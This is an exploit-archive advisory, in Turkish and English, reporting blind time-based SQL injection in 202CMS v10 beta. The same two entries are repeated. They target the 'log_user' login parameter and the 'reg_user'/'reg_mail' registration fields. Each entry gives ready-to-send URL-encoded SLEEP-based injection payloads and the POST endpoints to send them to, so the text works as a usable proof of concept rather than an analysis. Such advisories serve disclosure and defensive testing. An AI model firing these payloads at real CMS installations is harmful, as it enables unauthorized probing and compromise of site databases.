# Exploit Title/Exploit Başlığı: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title/Exploit Başlığı: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
# Exploit Adresi : https://www.exploit-db.com/exploits/46579
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title/Exploit Başlığı: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
# Exploit Adresi : https://www.exploit-db.com/exploits/46579
